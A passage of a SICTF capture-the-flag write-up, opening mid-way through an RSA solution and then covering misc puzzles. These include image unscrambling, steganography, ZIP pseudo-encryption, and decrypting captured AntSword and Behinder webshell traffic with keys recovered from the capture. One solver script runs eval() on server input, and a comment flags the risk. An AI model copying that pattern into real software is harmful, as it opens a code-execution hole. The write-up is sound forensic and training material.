c = 2531158826968617795544873459382924122557717998816471394185297761103165748335435821170312723425685754304593149059523546269415450028650433532186356690459152658716429727754058801940418375009330303011015596430823315562597921339142657700112773216179353217193003237231148578980083913537858412584394500321778663550078078453618131369772835451092134304931989160942358095112708247915404212408853664235381251636247376324342533649868102473113101371215832092655082602327789828382399225857288407727650695390198437041349338942170124451717727569429058059588332470520442654660036009106297229315947988026824070192958413771405369270417379270374431961932069206109206161520275394313505820463761099423216881808146286391590926110021195867454364700541623522262060621284175358641983644868144565468138995121112460328796239716467234302639110139539344210308625672626603127571066630984045144311082417597696435510923920160972112096181019887945632185522235223506525708287260043860468761726771872558899346408414769503761014563423778852669138635859686736852316406111419524586006203324427627048026773761720661277548633577985130942663878925016690093178475160050819045078580634083929746843262635482326801110839969924987635836386629346989957215883775774862958649233978388845660025913638761677759389478930243175239144733327800081152106209646739750122765156649897077908081118880599237097094240320843249439338789419717672024431563955989561679955135760168859754158570903936619008811737888041492853293708549071333614052392698390018837802159322555013199352827516627221502851043569094458259655754906871531251591905933391694174493730825567195976485916248779265827481232289167916191548009886470910634735729201594988224309556499928363028987684291355841520596773445265794499135026810820222595295206645909316879282568462640527161761336207089714210305413980656649518317233579495730882264811653783056739697123832993914282956316935519409352921107116007868383349191994002287186205998134696100386762054262057891768468786968255026912722629101160706454
57393868500548461673077440227088318332525177786077962585982909081392743452213436515836182492873087382790116829607874601891834450956381641167347006244967114872271767408283976962956202327963560051360585178283111398393814240663020861119306359981430630334461318598527979587651991738077155410459561082855969587807428348055332235383663543270877360885005990943581071646894235729647933857881942189189195964788620972924776284263603338743142601081333393759426665086063113918052529662779617581088219461544284776161000043214576048792205237424276333238729536999315219803320262415310494740314381427923946285760161213220362947401769801899408530366793758455770179787830710159708291366762213895858480581895447937605701967976294322826723710002908404921197204333501928336488397947305981886203744168652324266585388419008971081621735807393236753248807784949240389823583495318481970909905410207082951161566243891352736504918116010116369039285860115045264314986520115486931579850294563988511898210207789585278091744331562435440306243419157138106612870376595860187680854706702407909421715068436372714427218236082664903646274293310236981999552184563717162690049797649823839212948428641211961246994020372045985043109693907890920011143198228522425009411413552816937251104605065484262631052134984041975196066158316728539316465837577421454925621012505465939978745860769266412410473175108380240421475087705951757181461757168338677815812452986583921755020694839797363363307311249420367570717090866380752846555897878685650237637346642193539401438201833185346403605062877792084684272683771839735015283337498160038558348635653941224481910295785285116501946326239892086374010081144224516863123196440545149447005664309128353405186016987671281958337041826577305665892478912776271010271066357329981367353980788588993847131185936689847735929047041314029051457545700919669011204112014052564352320632957908331611320022462796631613884219972422269071268298589221747096536276961463554726902621981273389711126107538396616770804637751124118841962
30185877234066728564716929551607129141735155379529048300204700285511666205204686244751557147684338591300111406075976759988295937870045743031816067994768915303111125253664865369863586807234945352445045026501495849671447691502253489642657652848949102823407762108943161789244134119866441040670840037015617307056821150285453994199024947457774647253618512995677313792036106100497936654142008173389260345411854520383366800831542339243757421033121103167943520915885043698882609693007629591093225819727653240183003450339802857059736870645197609170799838610316307123146927966669912638227587517396282910946355194781275415343491170583392480153599086125374051844306869510079152461763122622668280249192047024784624692776244265874153473114993619019113474166958126841368545758693832786756946298833891033171752534079387364641021835311861509609494125593285947444939996542402774020507531158198766149282993994638607458820211163623309687149807339960007614766879688676462400606899851539023671152038536934433128973358637812907001112093086713949701646964777013925616637956114825918525229968119306607256312727518429074253193934915609865400118400124334806320033990630595454381780378123232633134565408152216410478497582716891919477755736223636583493709691482948793995974775520709337409910573358960632077245564017495103173982250506224927848890977671698731337737945862469303397352291579706358090437359126171980555387033997507170208063868788685780633727495158542911276981383764698030088894904043298340184342818716278091407356551940358010532738356144600648671870141201656260882560550096111259047730234565173017875969390130055742832375612379167064701421263006004472414998830886590121784525812803198481744263349186310137594023961272959521982892804372412802448375074058059953851751721276448647238818757245128139844126234490887064897176175605991477364838775902549049484485649550475857257115219540606931472558004890564503134870490140656624241401747198540715275804941032074573356860460172868340373583692584902872979221114982298050586685
71988706087341385062164551912895402225385092982560826327309647694259133336796850979092547838896097433415715599058725966408590337763564597138926155440501449180985611396207232111532932375188085024545085542973369098668746251453979325611123899183040426483394595005754804134755226535191207540606825430158952736837655205775065688859586704801501225535006002343875247706830744595624568318309651226721789114981271968662238124026046677255288978864187606405796017383766402958619673143645657441455997232070540086127159246237987567627725108631287219571602471946884739377889215449834429655413686886873295091016239052199666083351601086826734153974429960305084253065178042594753181647956642616542212325228542707686206755326024035739599146348501177812563534707664133720516216365891595825787918995106843259149228748312994412528796391371373617414372675456343701376095861833447737772759691858868592888442826744942275177530915382116406615715712757893143078978279143246697274308325693084656091638002293543907419420858741349983034872100430604784391609038287942720865394687440441658148249741973746563815823734033082270357366531891766736047129461161022479424754670180104429082538796999492573516522302155029457721131208616907738998536735170709971248369824365887000726117794650869883079208008740014546846645701302364858570783166196899378915154505168100826329302107869313843266841156284290464566135649989158820783121418285248550756939109408077028154683076217207573710819678235464207349189067201484570732096639149146760928062704783483877341613038073507448836427114954342514910127221383398345169091277591409968831007802831786813989558646964824169143439055973802066579053574891166719834147832981817205010359316914407771308185896894527780291163151452477051677398769116284677489282840701026276659840287396527270820151904333993047462174806536013299886191109009721024774418187781155804769156349009311281088098841688085936363169386244129140134486836251795815713481563263315210116479221119987277000421457534255675195475306743605721698910
5115974894826691301734658752554796336087163153087013755182247902851847839867807219615044427616326518986674768302109569955218389569458769985874451273117138435546665024826358058600551523916808015505037962468350942106702503883112975634757971636535249998962164886704286732345711210362931312187319836001555348202695806282730945501510756659164231139623277954192087899140537284122009070763979073048837471984618684020674370221463294306239424220412900401460550783283591789801735401367473630854684306273273881688896021682911944793729874921181848098382943970467341811398482121657330781393699096796050290808604481724879698091852697163383826854575487201365106673196811573729247280577781500366763330567122007588833805912087009446499739562463428568952248234506507069953596589309728265145195922268165106056450388840269349409588020300011340940321969965833519126936472969929255823540027083032424724503173052044192907375974391257436211908641463947719594493311129179150043015816776680636855703407557636501711566215605658114055289137679940955
e = 19458216662993202562182929756256684791318810848802754020883513588583377528821730559897870095442161189229950925325157413999927847684731484753811988111830295294129447423655650029218971567158117911790213848402209470536199246476182240248742771389082526603384625792117047996128232952372477895218147279573573322975526303267821446640338606290250958710008158544852602338088244940388562828263436457418528981476220691508040085291576643321726669065360399003917048894093458055139757991688086912143763420958307099065105543361779847689716282373299487102518794317683805758527645283956734672229827240143254092779918701447288342107763
alpha = 8
root = 127314748520905380391777855525586135065716774604121015664758778084648831235208544136462336
p = prePrime(libnum.nroot((n0//root),58))
print()
q = gen_num(p*alpha)
r = gen_num(q*alpha*2)
s = gen_num(r*alpha*4)

n = p**alpha * q**(alpha*2) * r**(alpha*4) * s**2

phi_n = (p**alpha - p**(alpha-1)) * (q**(alpha*2) - q**(alpha*2-1)) * (r**(alpha*4) - r**(alpha*4-1)) * (s**2 - s)
d = gmpy2.invert(e,phi_n)
m = pow(c,d,n)
print(libnum.n2s(int(m)))

As was later pointed out to me, since p > m you can also simply work mod p.
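Why reducing modulo p is enough, as an added example that is not part of the original write-up: p divides n, so c mod p already equals m^e mod p, and e only has to be inverted modulo p - 1. The Mersenne primes, exponent and message below are constructed stand-ins for the challenge values.

```python
# Constructed stand-ins: four Mersenne primes replace the challenge's far
# larger p, q, r, s; E and the message are made up as well.
P, Q, R, S = 2**61 - 1, 2**89 - 1, 2**107 - 1, 2**127 - 1
E = 65537
ALPHA = 8


def build_modulus(p, q, r, s, alpha=ALPHA):
    """Same shape as the write-up's n: p^a * q^(2a) * r^(4a) * s^2."""
    return p**alpha * q**(2 * alpha) * r**(4 * alpha) * s**2


def decrypt_full(c, e, p, q, r, s, alpha=ALPHA):
    """The long way: invert e modulo phi(n) built from every prime power."""
    phi = ((p**alpha - p**(alpha - 1))
           * (q**(2 * alpha) - q**(2 * alpha - 1))
           * (r**(4 * alpha) - r**(4 * alpha - 1))
           * (s**2 - s))
    d = pow(e, -1, phi)
    return pow(c, d, build_modulus(p, q, r, s, alpha))


def decrypt_mod_p(c, e, p):
    """The shortcut: p divides n, so c mod p == m^e mod p, and inverting e
    modulo p - 1 returns m mod p, which equals m only when m < p."""
    d_p = pow(e, -1, p - 1)
    return pow(c % p, d_p, p)


def demo():
    n = build_modulus(P, Q, R, S)
    m = int.from_bytes(b"SICTF!!", "big")   # 56 bits, below P (61 bits)
    c = pow(m, E, n)
    return m, decrypt_full(c, E, P, Q, R, S), decrypt_mod_p(c, E, P)


if __name__ == "__main__":
    m, full, short = demo()
    print(full == m, short == m)
```

If the message were larger than p, the shortcut would return only m mod p, which is why the condition p > m matters.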

MISC

签到打卡完成 (check-in)

The color is rather faint; you can pull up the contrast in Photoshop.

You can also extract the pixels whose color is (239,239,239).

If it is hard to scan, scan it with CQR and generate a new code from the result.

Send SICTF to get the flag.

color

A scrambled image in which traces of a QR code are still visible.

![image](https://img-blog.csdnimg.cn/b4f227e5d22440f8b26db518471f8289.png)

There is extra data after the end of the file: a ZIP archive. Restore the PK header and extract it to get the encryption script.

from PIL import Image
import random
flag = Image.open("flag.png")
flag = flag.convert("RGB")
new = Image.new("RGB",flag.size)
h=flag.height
w=flag.width
num=[0,128,255]
for i in range(h):
    for k in range(w):
        r,g,b = flag.getpixel((i,k))
        if r == 0 and g == 0 and b ==0:
            new.putpixel((i,k),((random.choice(num),random.choice(num),random.choice(num))))
        else:
            new.putpixel((i,k),(random.randint(0,255),random.randint(0,255),random.randint(0,255)))
new.save('save.png')

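This script replaces each RGB channel of a black pixel with a random value chosen from 0, 128 and 255.

The RGB channels of white pixels are replaced with random values from 0 to 255.

Write a script that reverses it: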

from PIL import Image

load = Image.open('save.png').convert('RGB')
flag = Image.new('RGB', load.size)
marks = (0, 128, 255)
for y in range(load.height):
    for x in range(load.width):
        r, g, b = load.getpixel((x, y))
        # Every channel in {0, 128, 255}: this was a black pixel
        if r in marks and g in marks and b in marks:
            flag.putpixel((x, y), (0, 0, 0))
        else:
            flag.putpixel((x, y), (255, 255, 255))

#flag.show()
flag.save('flag.png')

Scan the code to get the flag.

geek_challenge

An interactive arithmetic challenge.

![image](https://img-blog.csdnimg.cn/a3c200a9fbd34bb886a0af7da39acfa3.png)

Write a pwntools interaction script. Why it has to be solved 5000 times is beyond me; it is not friendly to the server.

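from pwn import *

context.log_level = 'debug'
r = remote('ctf.qsnctf.com', 10840)
r.recvuntil(b'\n\n')
i = 0
while True:
    # Each round is one line ending in "= ?"; drop that suffix
    calc = r.recvline()[:-4]
    # eval() executes whatever the server sends, so only point this at a service you trust
    r.sendlineafter(b'answer:', str(eval(calc)).encode())
    if r.recvline() != b'Good job!\n':
        break
    i += 1

print(i)
r.interactive()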
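The script above passes whatever the server sends to eval(), so a hostile or compromised service could run code on the solver's machine. One way to avoid that, as an added example that is not part of the original write-up: parse the prompt with ast and evaluate only numbers and arithmetic operators (the operator set and the sample prompts are assumptions).

```python
import ast
import operator

# Operators the solver is willing to evaluate. The set is an assumption about
# what the service sends; "**" is left out so a prompt cannot demand a huge
# exponentiation.
BIN_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
    ast.Div: operator.truediv, ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
}
UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}
MAX_PROMPT_LEN = 256


def _walk(node):
    """Evaluate one AST node, rejecting anything that is not plain arithmetic."""
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in BIN_OPS:
        return BIN_OPS[type(node.op)](_walk(node.left), _walk(node.right))
    if isinstance(node, ast.UnaryOp) and type(node.op) in UNARY_OPS:
        return UNARY_OPS[type(node.op)](_walk(node.operand))
    raise ValueError("refusing to evaluate " + type(node).__name__)


def safe_calc(prompt):
    """Evaluate b'<expression> = ?' using numbers and arithmetic only."""
    if len(prompt) > MAX_PROMPT_LEN:
        raise ValueError("prompt too long")
    text = prompt.decode("ascii").strip()
    if text.endswith("= ?"):
        text = text[:-3]
    try:
        tree = ast.parse(text.strip(), mode="eval")
    except SyntaxError as exc:
        raise ValueError("not an expression") from exc
    return _walk(tree.body)


# Constructed prompts in the shape the original script expects
SAMPLE_OK = b"12 + 34 * 2 = ?\n"
SAMPLE_HOSTILE = b"__import__('os').getcwd() = ?\n"
```

In the solver, `str(eval(calc))` becomes `str(safe_calc(line))`, where `line` is the full line returned by `r.recvline()`.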

hacker

AntSword (蚁剑) traffic.

In TCP stream 20, follow the HTTP stream.

Strip the first nine characters and base64-decode to get:

U2FsdGVkX19bEN3D8vFeG39VyYXPwle2mMQLh5T1HYiSI1XCx7rJhsDnp9qLpUQB
yITd05Uu05ZAv0o=e264c55be
/tmp
a7eb3df874e

U2FsdGVkX19 decodes to Salted__, which usually indicates salted AES, DES, TripleDES, Rabbit or RC4 from a website.

A key is needed. One directory appears again and again in the earlier streams:

`cd /var/tmp/password1sGui_1s_shumu`

Decrypting with Rabbit gives the flag.

hacker2

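The big hacker 树木 (Shumu) has uploaded a shell again and connected to it with a tool. He found an important string among a pile of test txt files in the upload directory, and we observed and captured the traffic.
Can you tell us the name of the shell he uploaded, the key, and the important string he finally found?
Flag format: SICTF{shell name_key_string stored in the text file}

TCP stream 0 already shows the signature of a Behinder (冰蝎) webshell.

The key is 7d7c23e87b47368b

TCP stream 13 shows she1l.php

Incidentally, what this stream contains is the authentication traffic between the Behinder controller and the controlled host.

After that it is just a matter of reading through the traffic slowly.

Following the HTTP stream of TCP stream 46 turns up: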

uU7xO0V/KGySO6rdSlEw/dQXFklZWZn1EMhiAAoH7WNpJcvkV3JcvqHelZOOHVA0YKUdylNKNgf4+x+WrC/GkA==

Behinder's AES uses CBC mode with an IV of sixteen \x00 bytes.

Decrypt with a script:

from base64 import b64decode
from Crypto.Cipher import AES


def aes_def(key, input_text):
    # Non-preserving mode: restore base64 padding if it was stripped
    input_text += b"=" * (-len(input_text) % 4)
    input_text = b64decode(input_text)
    mode = AES.MODE_CBC
    # All-zero IV, as used by Behinder
    iv = b'\0' * 16
    cryptos = AES.new(key, mode, iv)
    plain_text = cryptos.decrypt(input_text).decode('utf-8', 'ignore')
    return plain_text


key = b"7d7c23e87b47368b"
message = b'uU7xO0V/KGySO6rdSlEw/dQXFklZWZn1EMhiAAoH7WNpJcvkV3JcvqHelZOOHVA0YKUdylNKNgf4+x+WrC/GkA=='
decode_message = aes_def(key, message)
print(decode_message)

Result:

{"status":"c3VjY2Vzcw==","msg":"YzByUmVjdCEhIQ=="}

Base64-decoding msg gives c0rRect!!!

Putting the pieces together gives the flag:

SICTF{she1l_7d7c23e87b47368b_c0rRect!!!}

ezmisc

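Second blood. The difficulty of this one was reasonable; it was the least-solved challenge, and both the first-blood solver and I used unintended solutions.

When extracting, flag.zip turns out to be pseudo-encrypted; after changing the two 09 bytes to 00 it extracts normally.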

f1ag.png

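This is the secret a wandering flag left for us: I need a full Chinese pinyin spelling.

It is definitely not 泷奈 (Takina),

so look inside secret.txt.

Try reversing each line and base64-decoding it.

Each line turns out to hold three numbers, which suggests RGB. There are 268780 lines in total, which matches the resolution of f1ag exactly.

Write a script to turn them into an image; whether the channel order is RGB or BGR does not affect solving (unintended solution).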

from PIL import Image
import base64

secret = open('secret~.txt', 'r').readlines()[:-2]

f1ag = Image.open('f1ag.png')
print(f1ag.size)
secret_img = Image.new('RGB', f1ag.size)

h = f1ag.height
w = f1ag.width

for i in range(w):
    for k in range(h):
        now_index = (i * h) + k
        # Reverse the line, split it into its base64 fields, restore their order, decode each to an integer
        decode_base = [int(base64.b64decode(x).decode()) for x in (secret[now_index][::-1].split()[::-1])]
        # Whether the order is RGB or BGR does not affect solving
        r, g, b = decode_base[0], decode_base[1], decode_base[2]

        secret_img.putpixel((i, k), (r, g, b))


# secret_img.show()
secret_img.save('wtf2.png')

Rikka (六花) is in fact already recognizable.

XOR this image with f1ag.

It is 小鸟游六花 (Rikka Takanashi); I even tracked down the original artwork, pid 93430703.

The end of the f1ag.png file carries the signature of OurSecret steganography.

Use OurSecret on f1ag.png with the password xiaoniaoyouliuhua.

This yields flag.txt.

Xkey and attachment.7z were never used, so this was an unintended solution.

In fact, XXencode-decoding Xkey gives the password of the 7z archive, which contains an obfuscated encryption script.

王八树木

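Open the file 树木.

At a glance it is a JPG with its bytes reversed; after reversing it back, there is an encrypted ZIP at the end of the file.

Brute-forcing gives the password 123456.

That yields the password SI!!!!!!

Decode the JPG with SilentEye.

This gives the parameters of the Arnold cat map (猫脸变换).

Restore the image with a script: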

import cv2
import numpy as np
import matplotlib.image as mpimg

def de_arnold(img,shuffle_time,a,b):
    r, c, d = img.shape
    dp = np.zeros(img.shape, np.uint8)

    for s in range(shuffle_time):
        for i in range(r):
            for j in range(c):
                x = ((a * b + 1) * i - b * j) % r
                y = (-a * i + j) % c
                dp[x, y, :] = img[i, j, :]
        img = np.copy(dp)
    return img

img = mpimg.imread('flag.bmp')
img = img[:, :, ::-1]
new = de_arnold(img, 2, 1, 2)
cv2.imshow('picture', new)
cv2.waitKey(0)


Revenge

The ZIP is pseudo-encrypted.
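The pseudo-encryption mentioned here and for flag.zip in ezmisc is bit 0 of the general-purpose flag, stored once in each entry's local file header and once in its central directory record. This added example (not from the original write-up) finds both fields by walking the central directory, spots a stored entry whose sizes rule out real encryption, and clears the bit; it assumes a non-ZIP64 archive that starts at offset 0 and runs on a constructed sample.

```python
import io
import struct
import zipfile

EOCD_SIG, CDH_SIG, LFH_SIG = b"PK\x05\x06", b"PK\x01\x02", b"PK\x03\x04"
ENCRYPTED_BIT = 0x0001  # bit 0 of the general-purpose flag field


def flag_offsets(data):
    """Return (central_flag_offset, local_flag_offset) for every entry."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("end-of-central-directory record not found")
    total, _cd_size, pos = struct.unpack_from("<HLL", data, eocd + 10)
    pairs = []
    for _ in range(total):
        if data[pos:pos + 4] != CDH_SIG:
            raise ValueError("central directory entry expected at %d" % pos)
        name_len, extra_len, comment_len = struct.unpack_from("<3H", data, pos + 28)
        (local_off,) = struct.unpack_from("<L", data, pos + 42)
        if data[local_off:local_off + 4] != LFH_SIG:
            raise ValueError("local file header expected at %d" % local_off)
        pairs.append((pos + 8, local_off + 6))
        pos += 46 + name_len + extra_len + comment_len
    return pairs


def set_encrypted_bit(data, on):
    """Set or clear bit 0 in both copies of every entry's flag field."""
    buf = bytearray(data)
    for pair in flag_offsets(data):
        for off in pair:
            (flags,) = struct.unpack_from("<H", buf, off)
            flags = (flags | ENCRYPTED_BIT) if on else (flags & ~ENCRYPTED_BIT)
            struct.pack_into("<H", buf, off, flags & 0xFFFF)
    return bytes(buf)


def looks_pseudo_encrypted(data):
    """A stored entry flagged as encrypted needs 12 extra bytes for the
    ZipCrypto header; equal compressed and plain sizes mean the flag lies."""
    for central, _local in flag_offsets(data):
        flags, method = struct.unpack_from("<2H", data, central)
        csize, usize = struct.unpack_from("<2L", data, central + 12)
        if flags & ENCRYPTED_BIT and method == 0 and csize == usize:
            return True
    return False


def build_sample():
    """Constructed sample: an unencrypted archive holding one stored entry."""
    bio = io.BytesIO()
    with zipfile.ZipFile(bio, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("flag.txt", "constructed sample contents")
    return bio.getvalue()


def read_entry(data, name="flag.txt"):
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name)
```

Changing a flag byte from 09 to 00, as done for flag.zip, clears bit 3 (data descriptor) along with bit 0; the function here clears only bit 0 and leaves the other flag bits untouched.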

Decompile the pyc with uncompyle6 to get the encryption script:

# uncompyle6 version 3.8.0
# Python bytecode 3.7.0 (3394)
# Decompiled from: Python 3.8.10 (default, Nov 14 2022, 12:59:47) 
# [GCC 9.4.0]
# Embedded file name: encode.py
# Compiled at: 2023-01-17 14:47:26
# Size of source mod 2**32: 439 bytes
import secret
import cv2
import numpy as np
from random import randint
Hg = np.float32(cv2.imread('flag.png', 1))
for i in range(64):
    for j in range(64):
        Si = randint(0, 2)
        Fe = Hg[:, :, Si]
        Mg = cv2.dct(Fe[8 * i:8 * i + 8, 8 * j:8 * j + 8])
        if secret[(i * 64 + j)] == '1':
            Mg[(7, 7)] = 20
        else:
            if secret[(i * 64 + j)] == '0':
                Mg[(7, 7)] = -20
        Fe[8 * i:8 * i + 8, 8 * j:8 * j + 8] = cv2.idct(Mg)
        Hg[:, :, Si] = Fe

cv2.imwrite('flag.png', Hg)
# okay decompiling key.pyc

This is an 8x8 block-wise DCT.

secret consists of 0s and 1s.

Si is a random number from 0 to 2, so just try all three:

import cv2
import numpy as np
from random import randint

# read the original image
Hg = np.float32(cv2.imread('../flag.png', 1))

# create an empty list to store the hidden information
secret = []

# iterate through each 8x8 block
for i in range(64):
    for j in range(64):
        for Si in range(3):
            Fe = Hg[:, :, Si]
            Mg = cv2.dct(Fe[8 * i:8 * i + 8, 8 * j:8 * j + 8])
            if Mg[(7, 7)] > 10:
                secret.append('1')
            elif Mg[(7, 7)] < -10 :
                secret.append('0')

# print the recovered secret message
print(''.join(secret))

This gives a string of 0 and 1 bits.


Strip the zeros at the end that were added as padding.
